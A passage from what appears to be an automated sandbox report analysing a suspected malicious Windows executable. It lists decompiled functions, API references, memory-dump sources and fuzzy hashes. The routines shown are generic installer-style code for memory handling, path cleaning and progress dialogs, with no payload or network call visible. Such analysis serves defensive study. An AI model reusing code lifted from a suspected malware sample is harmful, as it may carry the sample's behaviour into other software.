                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                          • API String ID: 717251189-1230650788
                                                                                                                          • Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                                                          • Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
                                                                                                                          • Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                                                          • Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			E704824D8(intOrPtr* _a4) {
                                                                                                                          				char _v80;
                                                                                                                          				int _v84;
                                                                                                                          				intOrPtr _v88;
                                                                                                                          				short _v92;
                                                                                                                          				intOrPtr* _t28;
                                                                                                                          				void* _t30;
                                                                                                                          				intOrPtr _t31;
                                                                                                                          				signed int _t43;
                                                                                                                          				void* _t44;
                                                                                                                          				intOrPtr _t45;
                                                                                                                          				void* _t48;
                                                                                                                          
                                                                                                                          				_t44 = E70481215();
                                                                                                                          				_t28 = _a4;
                                                                                                                          				_t45 =  *((intOrPtr*)(_t28 + 0x814));
                                                                                                                          				_v88 = _t45;
                                                                                                                          				_t48 = (_t45 + 0x41 << 5) + _t28;
                                                                                                                          				do {
                                                                                                                          					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
                                                                                                                          					}
                                                                                                                          					_t43 =  *(_t48 - 8) & 0x000000ff;
                                                                                                                          					if(_t43 <= 7) {
                                                                                                                          						switch( *((intOrPtr*)(_t43 * 4 +  &M70482626))) {
                                                                                                                          							case 0:
                                                                                                                          								 *_t44 = 0;
                                                                                                                          								goto L17;
                                                                                                                          							case 1:
                                                                                                                          								__eax =  *__eax;
                                                                                                                          								if(__ecx > __ebx) {
                                                                                                                          									_v84 = __ecx;
                                                                                                                          									__ecx =  *(0x7048307c + __edx * 4);
                                                                                                                          									__edx = _v84;
                                                                                                                          									__ecx = __ecx * __edx;
                                                                                                                          									asm("sbb edx, edx");
                                                                                                                          									__edx = __edx & __ecx;
                                                                                                                          									__eax = __eax &  *(0x7048309c + __edx * 4);
                                                                                                                          								}
                                                                                                                          								_push(__eax);
                                                                                                                          								goto L15;
                                                                                                                          							case 2:
                                                                                                                          								__eax = E70481429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                                                          								goto L16;
                                                                                                                          							case 3:
                                                                                                                          								__eax = lstrcpynA(__edi,  *__eax,  *0x7048405c);
                                                                                                                          								goto L17;
                                                                                                                          							case 4:
                                                                                                                          								__ecx =  *0x7048405c;
                                                                                                                          								__edx = __ecx - 1;
                                                                                                                          								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
                                                                                                                          								__eax =  *0x7048405c;
                                                                                                                          								 *((char*)(__eax + __edi - 1)) = __bl;
                                                                                                                          								goto L17;
                                                                                                                          							case 5:
                                                                                                                          								__ecx =  &_v80;
                                                                                                                          								_push(0x27);
                                                                                                                          								_push(__ecx);
                                                                                                                          								_push( *__eax);
                                                                                                                          								__imp__StringFromGUID2();
                                                                                                                          								__eax =  &_v92;
                                                                                                                          								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x7048405c, __ebx, __ebx);
                                                                                                                          								goto L17;
                                                                                                                          							case 6:
                                                                                                                          								_push( *__esi);
                                                                                                                          								L15:
                                                                                                                          								__eax = wsprintfA(__edi, 0x70484000);
                                                                                                                          								L16:
                                                                                                                          								__esp = __esp + 0xc;
                                                                                                                          								goto L17;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L17:
                                                                                                                          					_t30 =  *(_t48 + 0x14);
                                                                                                                          					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
                                                                                                                          						GlobalFree(_t30);
                                                                                                                          					}
                                                                                                                          					_t31 =  *((intOrPtr*)(_t48 + 0xc));
                                                                                                                          					if(_t31 != 0) {
                                                                                                                          						if(_t31 != 0xffffffff) {
                                                                                                                          							if(_t31 > 0) {
                                                                                                                          								E704812D1(_t31 - 1, _t44);
                                                                                                                          								goto L26;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							E70481266(_t44);
                                                                                                                          							L26:
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_v88 = _v88 - 1;
                                                                                                                          					_t48 = _t48 - 0x20;
                                                                                                                          				} while (_v88 >= 0);
                                                                                                                          				return GlobalFree(_t44);
                                                                                                                          			}

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 70481215: GlobalAlloc.KERNEL32(00000040,70481233,?,704812CF,-7048404B,704811AB,-000000A0), ref: 7048121D
                                                                                                                          • GlobalFree.KERNEL32 ref: 704825DE
                                                                                                                          • GlobalFree.KERNEL32 ref: 70482618
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                          • String ID: {t@ut
                                                                                                                          • API String ID: 1780285237-3262140062
                                                                                                                          • Opcode ID: aafe1e2342d08fc9ca852de4a70fec6c6ed9cb253725dc4ce6a65bbe95d65ca6
                                                                                                                          • Instruction ID: 3ad4a477f990299fda884f16cb335541930da027154368ebc2136a3a5a51544e
                                                                                                                          • Opcode Fuzzy Hash: aafe1e2342d08fc9ca852de4a70fec6c6ed9cb253725dc4ce6a65bbe95d65ca6
                                                                                                                          • Instruction Fuzzy Hash: E641AE72544200EFD3029F54CE94D2F77BEEB86209B204D6DF642A72E4D739A905DB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E704822F1(void* __edx, intOrPtr _a4) {
                                                                                                                          				signed int _v4;
                                                                                                                          				signed int _v8;
                                                                                                                          				void* _t38;
                                                                                                                          				signed int _t39;
                                                                                                                          				void* _t40;
                                                                                                                          				void* _t43;
                                                                                                                          				void* _t48;
                                                                                                                          				signed int* _t50;
                                                                                                                          				signed char* _t51;
                                                                                                                          
                                                                                                                          				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                                                                                                          				while(1) {
                                                                                                                          					_t9 = _a4 + 0x818; // 0x818
                                                                                                                          					_t51 = (_v8 << 5) + _t9;
                                                                                                                          					_t38 = _t51[0x18];
                                                                                                                          					if(_t38 == 0) {
                                                                                                                          						goto L9;
                                                                                                                          					}
                                                                                                                          					_t48 = 0x1a;
                                                                                                                          					if(_t38 == _t48) {
                                                                                                                          						goto L9;
                                                                                                                          					}
                                                                                                                          					if(_t38 != 0xffffffff) {
                                                                                                                          						if(_t38 <= 0 || _t38 > 0x19) {
                                                                                                                          							_t51[0x18] = _t48;
                                                                                                                          						} else {
                                                                                                                          							_t38 = E704812AD(_t38 - 1);
                                                                                                                          							L10:
                                                                                                                          						}
                                                                                                                          						goto L11;
                                                                                                                          					} else {
                                                                                                                          						_t38 = E7048123B();
                                                                                                                          						L11:
                                                                                                                          						_t43 = _t38;
                                                                                                                          						_t13 =  &(_t51[8]); // 0x820
                                                                                                                          						_t50 = _t13;
                                                                                                                          						if(_t51[4] >= 0) {
                                                                                                                          						}
                                                                                                                          						_t39 =  *_t51 & 0x000000ff;
                                                                                                                          						_t51[0x1c] = _t51[0x1c] & 0x00000000;
                                                                                                                          						_v4 = _t39;
                                                                                                                          						if(_t39 > 7) {
                                                                                                                          							L27:
                                                                                                                          							_t40 = GlobalFree(_t43);
                                                                                                                          							if(_v8 == 0) {
                                                                                                                          								return _t40;
                                                                                                                          							}
                                                                                                                          							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                                                                                                          								_v8 = _v8 + 1;
                                                                                                                          							} else {
                                                                                                                          								_v8 = _v8 & 0x00000000;
                                                                                                                          							}
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							switch( *((intOrPtr*)(_t39 * 4 +  &M7048247E))) {
                                                                                                                          								case 0:
                                                                                                                          									 *_t50 =  *_t50 & 0x00000000;
                                                                                                                          									goto L27;
                                                                                                                          								case 1:
                                                                                                                          									__eax = E704812FE(__ebx);
                                                                                                                          									goto L20;
                                                                                                                          								case 2:
                                                                                                                          									 *__ebp = E704812FE(__ebx);
                                                                                                                          									_a4 = __edx;
                                                                                                                          									goto L27;
                                                                                                                          								case 3:
                                                                                                                          									__eax = E70481224(__ebx);
                                                                                                                          									 *(__esi + 0x1c) = __eax;
                                                                                                                          									L20:
                                                                                                                          									 *__ebp = __eax;
                                                                                                                          									goto L27;
                                                                                                                          								case 4:
                                                                                                                          									 *0x7048405c =  *0x7048405c +  *0x7048405c;
                                                                                                                          									__edi = GlobalAlloc(0x40,  *0x7048405c +  *0x7048405c);
                                                                                                                          									 *0x7048405c = MultiByteToWideChar(0, 0, __ebx,  *0x7048405c, __edi,  *0x7048405c);
                                                                                                                          									if(_v4 != 5) {
                                                                                                                          										 *(__esi + 0x1c) = __edi;
                                                                                                                          										 *__ebp = __edi;
                                                                                                                          									} else {
                                                                                                                          										__eax = GlobalAlloc(0x40, 0x10);
                                                                                                                          										_push(__eax);
                                                                                                                          										 *(__esi + 0x1c) = __eax;
                                                                                                                          										_push(__edi);
                                                                                                                          										 *__ebp = __eax;
                                                                                                                          										__imp__CLSIDFromString();
                                                                                                                          										__eax = GlobalFree(__edi);
                                                                                                                          									}
                                                                                                                          									goto L27;
                                                                                                                          								case 5:
                                                                                                                          									if( *__ebx != 0) {
                                                                                                                          										__eax = E704812FE(__ebx);
                                                                                                                          										 *__edi = __eax;
                                                                                                                          									}
                                                                                                                          									goto L27;
                                                                                                                          								case 6:
                                                                                                                          									__esi =  *(__esi + 0x18);
                                                                                                                          									__esi = __esi - 1;
                                                                                                                          									__esi = __esi *  *0x7048405c;
                                                                                                                          									__esi = __esi +  *0x70484064;
                                                                                                                          									__eax = __esi + 0xc;
                                                                                                                          									 *__edi = __esi + 0xc;
                                                                                                                          									asm("cdq");
                                                                                                                          									__eax = E70481429(__edx, __esi + 0xc, __edx, __esi);
                                                                                                                          									goto L27;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L9:
                                                                                                                          					_t38 = E70481224(0x70484034);
                                                                                                                          					goto L10;
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          APIs
                                                                                                                          • GlobalFree.KERNEL32 ref: 70482447
                                                                                                                            • Part of subcall function 70481224: lstrcpynA.KERNEL32(00000000,?,704812CF,-7048404B,704811AB,-000000A0), ref: 70481234
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 704823C2
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 704823D7
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 704823E8
                                                                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 704823F6
                                                                                                                          • GlobalFree.KERNEL32 ref: 704823FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                          • String ID: @ut
                                                                                                                          • API String ID: 3730416702-3384101347
                                                                                                                          • Opcode ID: 88a8c6634993cce5dc0ac77f39786fc3f496395da7a7eec9109460594d74e2ea
                                                                                                                          • Instruction ID: b376625025f8bc216ed30f1390814d8b2a9bed52721c67853ca001267eb9b6c9
                                                                                                                          • Opcode Fuzzy Hash: 88a8c6634993cce5dc0ac77f39786fc3f496395da7a7eec9109460594d74e2ea
                                                                                                                          • Instruction Fuzzy Hash: BC4185B2508701EFD3119F64CA44B2EB7FCFB40715F204C2EF9469A2E0D738A9458B62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406528(CHAR* _a4) {
                                                                                                                          				char _t5;
                                                                                                                          				char _t7;
                                                                                                                          				char* _t15;
                                                                                                                          				char* _t16;
                                                                                                                          				CHAR* _t17;
                                                                                                                          
                                                                                                                          				_t17 = _a4;
                                                                                                                          				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                                                          					_t17 =  &(_t17[4]);
                                                                                                                          				}
                                                                                                                          				if( *_t17 != 0 && E00405C52(_t17) != 0) {
                                                                                                                          					_t17 =  &(_t17[2]);
                                                                                                                          				}
                                                                                                                          				_t5 =  *_t17;
                                                                                                                          				_t15 = _t17;
                                                                                                                          				_t16 = _t17;
                                                                                                                          				if(_t5 != 0) {
                                                                                                                          					do {
                                                                                                                          						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
                                                                                                                          							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                                                          							_t16 = CharNextA(_t16);
                                                                                                                          						}
                                                                                                                          						_t17 = CharNextA(_t17);
                                                                                                                          						_t5 =  *_t17;
                                                                                                                          					} while (_t5 != 0);
                                                                                                                          				}
                                                                                                                          				 *_t16 =  *_t16 & 0x00000000;
                                                                                                                          				while(1) {
                                                                                                                          					_t16 = CharPrevA(_t15, _t16);
                                                                                                                          					_t7 =  *_t16;
                                                                                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                          					if(_t15 < _t16) {
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					break;
                                                                                                                          				}
                                                                                                                          				return _t7;
                                                                                                                          			}









                                                                                                                          APIs
                                                                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                                                                          • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\lpdKSOB78u.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                                                                          • CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406529
                                                                                                                          • "C:\Users\user\Desktop\lpdKSOB78u.exe" , xrefs: 00406564
                                                                                                                          • *?|<>/":, xrefs: 00406570
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: "C:\Users\user\Desktop\lpdKSOB78u.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 589700163-2201545603
                                                                                                                          • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                                                          • Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
                                                                                                                          • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                                                          • Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                          				struct tagLOGBRUSH _v16;
                                                                                                                          				long _t39;
                                                                                                                          				long _t41;
                                                                                                                          				void* _t44;
                                                                                                                          				signed char _t50;
                                                                                                                          				long* _t54;
                                                                                                                          
                                                                                                                          				if(_a4 + 0xfffffecd > 5) {
                                                                                                                          					L18:
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                                                          				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                                                          					goto L18;
                                                                                                                          				} else {
                                                                                                                          					_t50 = _t54[5];
                                                                                                                          					if((_t50 & 0xffffffe0) != 0) {
                                                                                                                          						goto L18;
                                                                                                                          					}
                                                                                                                          					_t39 =  *_t54;
                                                                                                                          					if((_t50 & 0x00000002) != 0) {
                                                                                                                          						_t39 = GetSysColor(_t39);
                                                                                                                          					}
                                                                                                                          					if((_t54[5] & 0x00000001) != 0) {
                                                                                                                          						SetTextColor(_a8, _t39);
                                                                                                                          					}
                                                                                                                          					SetBkMode(_a8, _t54[4]);
                                                                                                                          					_t41 = _t54[1];
                                                                                                                          					_v16.lbColor = _t41;
                                                                                                                          					if((_t54[5] & 0x00000008) != 0) {
                                                                                                                          						_t41 = GetSysColor(_t41);
                                                                                                                          						_v16.lbColor = _t41;
                                                                                                                          					}
                                                                                                                          					if((_t54[5] & 0x00000004) != 0) {
                                                                                                                          						SetBkColor(_a8, _t41);
                                                                                                                          					}
                                                                                                                          					if((_t54[5] & 0x00000010) != 0) {
                                                                                                                          						_v16.lbStyle = _t54[2];
                                                                                                                          						_t44 = _t54[3];
                                                                                                                          						if(_t44 != 0) {
                                                                                                                          							DeleteObject(_t44);
                                                                                                                          						}
                                                                                                                          						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                                                          					}
                                                                                                                          					return _t54[3];
                                                                                                                          				}
                                                                                                                          			}










                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                          • Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
                                                                                                                          • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                          • Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405374(CHAR* _a4, CHAR* _a8) {
                                                                                                                          				struct HWND__* _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				CHAR* _v32;
                                                                                                                          				long _v44;
                                                                                                                          				int _v48;
                                                                                                                          				void* _v52;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				CHAR* _t26;
                                                                                                                          				signed int _t27;
                                                                                                                          				CHAR* _t28;
                                                                                                                          				long _t29;
                                                                                                                          				signed int _t39;
                                                                                                                          
                                                                                                                          				_t26 =  *0x42ec24; // 0x0
                                                                                                                          				_v8 = _t26;
                                                                                                                          				if(_t26 != 0) {
                                                                                                                          					_t27 =  *0x42f514;
                                                                                                                          					_v12 = _t27;
                                                                                                                          					_t39 = _t27 & 0x00000001;
                                                                                                                          					if(_t39 == 0) {
                                                                                                                          						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
                                                                                                                          					}
                                                                                                                          					_t26 = lstrlenA(0x42a098);
                                                                                                                          					_a4 = _t26;
                                                                                                                          					if(_a8 == 0) {
                                                                                                                          						L6:
                                                                                                                          						if((_v12 & 0x00000004) == 0) {
                                                                                                                          							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
                                                                                                                          						}
                                                                                                                          						if((_v12 & 0x00000002) == 0) {
                                                                                                                          							_v32 = 0x42a098;
                                                                                                                          							_v52 = 1;
                                                                                                                          							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                                                                                                          							_v44 = 0;
                                                                                                                          							_v48 = _t29 - _t39;
                                                                                                                          							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                                                                                                          							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                                                                                                          						}
                                                                                                                          						if(_t39 != 0) {
                                                                                                                          							_t28 = _a4;
                                                                                                                          							 *((char*)(_t28 + 0x42a098)) = 0;
                                                                                                                          							return _t28;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t26 =  &(_a4[lstrlenA(_a8)]);
                                                                                                                          						if(_t26 < 0x800) {
                                                                                                                          							_t26 = lstrcatA(0x42a098, _a8);
                                                                                                                          							goto L6;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t26;
                                                                                                                          			}


















                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                          • lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                          • lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                          • SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2531174081-0
                                                                                                                          • Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                                                          • Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
                                                                                                                          • Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                                                          • Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402E52(intOrPtr _a4) {
                                                                                                                          				char _v68;
                                                                                                                          				long _t6;
                                                                                                                          				struct HWND__* _t7;
                                                                                                                          				struct HWND__* _t15;
                                                                                                                          
                                                                                                                          				if(_a4 != 0) {
                                                                                                                          					_t15 =  *0x42946c;
                                                                                                                          					if(_t15 != 0) {
                                                                                                                          						_t15 = DestroyWindow(_t15);
                                                                                                                          					}
                                                                                                                          					 *0x42946c = 0;
                                                                                                                          					return _t15;
                                                                                                                          				}
                                                                                                                          				if( *0x42946c != 0) {
                                                                                                                          					return E00406692(0);
                                                                                                                          				}
                                                                                                                          				_t6 = GetTickCount();
                                                                                                                          				if(_t6 >  *0x42f450) {
                                                                                                                          					if( *0x42f448 == 0) {
                                                                                                                          						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
                                                                                                                          						 *0x42946c = _t7;
                                                                                                                          						return ShowWindow(_t7, 5);
                                                                                                                          					}
                                                                                                                          					if(( *0x42f514 & 0x00000001) != 0) {
                                                                                                                          						wsprintfA( &_v68, "... %d%%", E00402E36());
                                                                                                                          						return E00405374(0,  &_v68);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t6;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(?,00000000), ref: 00402E6A
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402E88
                                                                                                                          • wsprintfA.USER32 ref: 00402EB6
                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                                                                            • Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp
